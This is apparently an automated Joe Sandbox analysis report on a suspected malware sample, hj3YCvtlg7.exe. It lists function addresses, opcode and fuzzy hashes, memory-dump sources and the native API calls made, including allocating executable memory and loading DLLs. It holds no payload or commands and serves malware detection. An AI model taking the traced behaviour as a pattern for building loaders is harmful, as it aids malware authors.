Source File: 00000000.00000002.1353268028.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_105d000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c555d241f04e18330eeacd88d514b6052a8432b1be4a80eb3c00361a9072e3e8
Instruction ID: a1dc9ac0bbd17348ebd54009dbac4f9cd0a1c6655e75812db73f6924b2e646ce
Opcode Fuzzy Hash: c555d241f04e18330eeacd88d514b6052a8432b1be4a80eb3c00361a9072e3e8
Instruction Fuzzy Hash: EFF0C2310043849EE7508A0ACD84B63FFE8EF41624F18C49BED480A286D2799844CBB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 010CD364 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1353446721.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10c0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d23ef5a5ed380a9b42400f624d103dd43b15fa137b3e5f8ef3968f8994c2b80
Instruction ID: 8b93cf18eb2431290a4255fae3dcd429e2f4b073d54b0966a7b3c0384046a8b5
Opcode Fuzzy Hash: 8d23ef5a5ed380a9b42400f624d103dd43b15fa137b3e5f8ef3968f8994c2b80
Instruction Fuzzy Hash: 3DA15C36E002068FCF05DFB4C44459EBBB2BF85B00B2585AEE906AB261DB31D916CF41

Uniqueness

Uniqueness Score: -1.00%

Function 07341180 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1356964784.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: true

Associated: 00000000.00000002.1356812219.00000000072D0000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72d0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ff6ed2e19a85a4ee175c45e5dbffbdcf16a6c015bf25826803e98168fa07dcb
Instruction ID: 6abdc640e95dfe58b77513849364592c986aefb1b2140235e33d643a7235a16f
Opcode Fuzzy Hash: 4ff6ed2e19a85a4ee175c45e5dbffbdcf16a6c015bf25826803e98168fa07dcb
Instruction Fuzzy Hash: 780179B1E15A189BFB1CCF6B8C0069FFAF7AFC9200F08C179891C6A264EB7415458E55

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: hj3YCvtlg7.exePID: 7832, Parent PID: 7652COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	2.9%
Signature Coverage:	5.9%
Total number of Nodes:	560
Total number of Limit Nodes:	72

Executed Functions

Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455

Strings

rMA, xrefs: 0041A44D, 0041A454
1JA, xrefs: 0041A42C, 0041A438
rMA, xrefs: 0041A432, 0041A440

Memory Dump Source

Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1JA$rMA$rMA
API String ID: 2738559852-782607585
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A40B Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455

Strings

rMA, xrefs: 0041A44D, 0041A454
1JA, xrefs: 0041A42C, 0041A438
rMA, xrefs: 0041A432, 0041A440

Memory Dump Source

Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1JA$rMA$rMA
API String ID: 2738559852-782607585
Opcode ID: 40296086b2c65b8e1281a00ba7c399c1232ea7f1d97edca416a916e4757591c9
Instruction ID: 9b28a46ab4fa2a32d5bfb7c5fd36816b9b2bf06c9a4a590c0aa8104f95e36be6
Opcode Fuzzy Hash: 40296086b2c65b8e1281a00ba7c399c1232ea7f1d97edca416a916e4757591c9
Instruction Fuzzy Hash: 9BF01DB2114049AFCB04DF99D880CEBB7ADEF8C218B15864DF95C97201C630E855CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A53A Relevance: 1.6, APIs: 1, Instructions: 78
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579

Memory Dump Source

Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 3abcdc1be25a100d8e90c82018335ced6614c48c47a8e34b9972859f4df0c279
Instruction ID: 21f0199be098d254c0e1f8a28cd9adb607e2c9389512d22ae25e752f30171257
Opcode Fuzzy Hash: 3abcdc1be25a100d8e90c82018335ced6614c48c47a8e34b9972859f4df0c279
Instruction Fuzzy Hash: 312147B2200208AFCB18DF88DC85EEB77ADEF8C754F148519BE0897241C634E861CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62

Memory Dump Source

Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95

Uniqueness

Uniqueness Score: -1.00%

Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD

Memory Dump Source

Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A35C Relevance: 1.5, APIs: 1, Instructions: 39
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD

Memory Dump Source

Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f9fb42313e651b9959a468de8585fd26e5716500142227deabab1e432ae5e1e9
Instruction ID: db03205a086da1a1d13bd787de8e7eaf85e719fb6bd48b883609cf1232bc0a34
Opcode Fuzzy Hash: f9fb42313e651b9959a468de8585fd26e5716500142227deabab1e432ae5e1e9
Instruction Fuzzy Hash: BAF014B2214148ABCB08DF98D884CEB77A9FF8C354B14864DFA0D93206D630E8518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579

Memory Dump Source

Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5

Memory Dump Source

Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0

Uniqueness

Uniqueness Score: -1.00%

Function 01762B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762B6A

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 31621645318e66b44b8fd572ae59d8afbbd2d217c074c4f39523de17d0a02042
Instruction ID: 6337b76b7c43efd9f372869b640c8484cec07f3ad79985103abda25e8bdfebe6
Opcode Fuzzy Hash: 31621645318e66b44b8fd572ae59d8afbbd2d217c074c4f39523de17d0a02042
Instruction Fuzzy Hash: EA90026120650003460571588418616800A97E0201F56C031E10145A0DC5258A916226

Uniqueness

Uniqueness Score: -1.00%

Function 01762BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762BFA

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 307f54e14c0a11529613c0adb7111d100e86a3f3acaebeaf713f840171b7bd9a
Instruction ID: ba0227ef09325f0c1c79577f04145f88b630df89539712e1318c10468169fc13
Opcode Fuzzy Hash: 307f54e14c0a11529613c0adb7111d100e86a3f3acaebeaf713f840171b7bd9a
Instruction Fuzzy Hash: 7490023120550802D6807158840864A400597D1301F96C035A0025664DCA158B5977A2

Uniqueness

Uniqueness Score: -1.00%

Function 01762AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762ADA

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: af822ff0ca7abf6a0152b99e903ad33737f7fd5e6caf58bab666df4e0a19412b
Instruction ID: f3a278736c3d0b104c3b7b95493499654c0e79b644abde0cd659de498126eb95
Opcode Fuzzy Hash: af822ff0ca7abf6a0152b99e903ad33737f7fd5e6caf58bab666df4e0a19412b
Instruction Fuzzy Hash: 8F900225215500030605B5584708507404697D5351756C031F1015560CD6218A615222

Uniqueness

Uniqueness Score: -1.00%

Function 01762D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762D3A

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9c2506ff7880a8f1d2f8de661288ebbb2f96d90664aef1efb2c0aae20b7a6697
Instruction ID: 241eb77a3f01bea4e4816fc94d0724dfb22e7d2114b791f4472a6e1b9a9fe36d
Opcode Fuzzy Hash: 9c2506ff7880a8f1d2f8de661288ebbb2f96d90664aef1efb2c0aae20b7a6697
Instruction Fuzzy Hash: 8990022130550003D6407158941C6068005E7E1301F56D031E0414564CD9158A565323

Uniqueness

Uniqueness Score: -1.00%

Function 01762D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762D1A

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fc24eb850970b50978852d610c4c11e7cffcb17b6e315fe70d03ab141af8da8f
Instruction ID: 961e57edceb6e5fb3b6fc91422f37daa204f0a112674188c222c09ddb10381dc
Opcode Fuzzy Hash: fc24eb850970b50978852d610c4c11e7cffcb17b6e315fe70d03ab141af8da8f
Instruction Fuzzy Hash: 5290022921750002D6807158940C60A400597D1202F96D435A0015568CC9158A695322

Uniqueness

Uniqueness Score: -1.00%

Function 01762DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762DFA

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 340241332a4b44b69e3a1e6ccc4aa3503a2deb70cbfd23ec5af99b7da23d5624
Instruction ID: cea4abfb9cc1eb233845dc36da57caeb39240fba3e9cd19a742e2b05b132e912
Opcode Fuzzy Hash: 340241332a4b44b69e3a1e6ccc4aa3503a2deb70cbfd23ec5af99b7da23d5624
Instruction Fuzzy Hash: C890023120550413D61171588508707400997D0241F96C432A0424568DD6568B52A222

Uniqueness

Uniqueness Score: -1.00%

Function 01762DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762DDA

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 18a6654cf013f53573050d6bb42c50a3d4df15356728c872ff80b6a972c94a08
Instruction ID: 4858db9347b7c00d9a8e49871105bdeaa2f65f55dac96da7633f0ed2fd79339e
Opcode Fuzzy Hash: 18a6654cf013f53573050d6bb42c50a3d4df15356728c872ff80b6a972c94a08
Instruction Fuzzy Hash: 16900221246541525A45B15884085078006A7E0241B96C032A1414960CC5269A56D722

Uniqueness

Uniqueness Score: -1.00%

Function 01762C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762C7A

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: befa5f6f34f9cee2dfcb4ddb782e3837d240503cae1d937ae01bcb4aef58764c
Instruction ID: aed9606ee08badf7a23248ad7d5174f471a0b4191f1a393b34f8bfbd2925981e
Opcode Fuzzy Hash: befa5f6f34f9cee2dfcb4ddb782e3837d240503cae1d937ae01bcb4aef58764c
Instruction Fuzzy Hash: AC90023120558802D6107158C40874A400597D0301F5AC431A4424668DC6958A917222

Uniqueness

Uniqueness Score: -1.00%

Function 01762CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762CAA

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 561d3d492f6e8922fc529cbb94a58303e774caa27d4e4fb07a454f9b97890453
Instruction ID: edd33cef6e60a76d43f340a3144c32e8386aeb73aa9904fb71a9acbc983858a1
Opcode Fuzzy Hash: 561d3d492f6e8922fc529cbb94a58303e774caa27d4e4fb07a454f9b97890453
Instruction Fuzzy Hash: 4B90023120550402D6007598940C646400597E0301F56D031A5024565EC6658A916232

Uniqueness

Uniqueness Score: -1.00%

Function 01762F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762F3A

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8a220c1f6f2d7c5f23846e60bac3218f7c9e3531f99b45f12ae3c3628c8536cc
Instruction ID: 9f22fc71efeff72b544323e8badad9e092b7e1bb31142e2b8b79f91c8a381334
Opcode Fuzzy Hash: 8a220c1f6f2d7c5f23846e60bac3218f7c9e3531f99b45f12ae3c3628c8536cc
Instruction Fuzzy Hash: 6290026134550442D60071588418B064005D7E1301F56C035E1064564DC619CE526227

Uniqueness

Uniqueness Score: -1.00%

Function 01762FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762FEA

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cb79a41b8be069327481432c14c6ad5ac656fc5412ca9b3557ce7611ae72ab9d
Instruction ID: 2780cf273c5fc94c4fe614b103c12c95c624f9d3e9eabe41bc76b0d4db20d2a0
Opcode Fuzzy Hash: cb79a41b8be069327481432c14c6ad5ac656fc5412ca9b3557ce7611ae72ab9d
Instruction Fuzzy Hash: 66900221215D0042D70075688C18B07400597D0303F56C135A0154564CC9158A615622

Uniqueness

Uniqueness Score: -1.00%

Function 01762FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762FBA

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fe96358129029a32457201c11f509d61e30f30cfc08423a446c9abb56d6cf7ee
Instruction ID: b3f1194d3bf4a1e2d2d04ebc4ca49bb1f1975e576d4decc26ca21a78ca90354e
Opcode Fuzzy Hash: fe96358129029a32457201c11f509d61e30f30cfc08423a446c9abb56d6cf7ee
Instruction Fuzzy Hash: 949002216055004246407168C8489068005BBE1211B56C131A0998560DC5598A655766

Uniqueness

Uniqueness Score: -1.00%

Function 01762F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762F9A

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6204da92fa82b0035802633367e8b46a14f48500a1f50bf981dbcf7a093ec256
Instruction ID: ab7329b6292be6b87681da3e7e720df5087802b5c3885cf251b62602723777ae
Opcode Fuzzy Hash: 6204da92fa82b0035802633367e8b46a14f48500a1f50bf981dbcf7a093ec256
Instruction Fuzzy Hash: E190023120590402D6007158881870B400597D0302F56C031A1164565DC6258A516672

Uniqueness

Uniqueness Score: -1.00%

Function 01762EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762EAA

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1b7fcd046201922cf43e1b08bb6b76ab1ff58a24c1ac305742eadc8775b803f7
Instruction ID: 4f6c544e1c9f4bc262954f19114bef7eff21486d5d7452fdcdf01c255ff79276
Opcode Fuzzy Hash: 1b7fcd046201922cf43e1b08bb6b76ab1ff58a24c1ac305742eadc8775b803f7
Instruction Fuzzy Hash: FC90027120550402D64071588408746400597D0301F56C031A5064564EC6598FD56766

Uniqueness

Uniqueness Score: -1.00%

Function 01762E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762E8A

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f327775d835165a68c501467aafc09c4bff2b985fec5efcd8f83c71dc7a4038b
Instruction ID: 5cec2eb2de273af7ef5c1b27adcc5ecc8f5f9795cd3ef70429dc22916a63c392
Opcode Fuzzy Hash: f327775d835165a68c501467aafc09c4bff2b985fec5efcd8f83c71dc7a4038b
Instruction Fuzzy Hash: 3690022160550502D60171588408616400A97D0241F96C032A1024565ECA258B92A232

Uniqueness

Uniqueness Score: -1.00%

Function 00409AB0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D

Strings

6EA, xrefs: 0041A652, 0041A65C

Memory Dump Source

Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: 6EA
API String ID: 1279760036-1400015478
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00408308 Relevance: 1.6, APIs: 1, Instructions: 56
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 3652f5063e7420592e5ed941896d8be1a842ecbfb45ce89cbd134adf593fc7ce
Instruction ID: 03cb6314e5724dbbfdddbc1813a237f8b63e8bde2db8bf04119014b41ccd526d
Opcode Fuzzy Hash: 3652f5063e7420592e5ed941896d8be1a842ecbfb45ce89cbd134adf593fc7ce
Instruction Fuzzy Hash: 8401B531A8032877E721A6959C42FEE762C6B40F55F04011AFF04BA1C2EAE9690546EA

Uniqueness

Uniqueness Score: -1.00%

Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
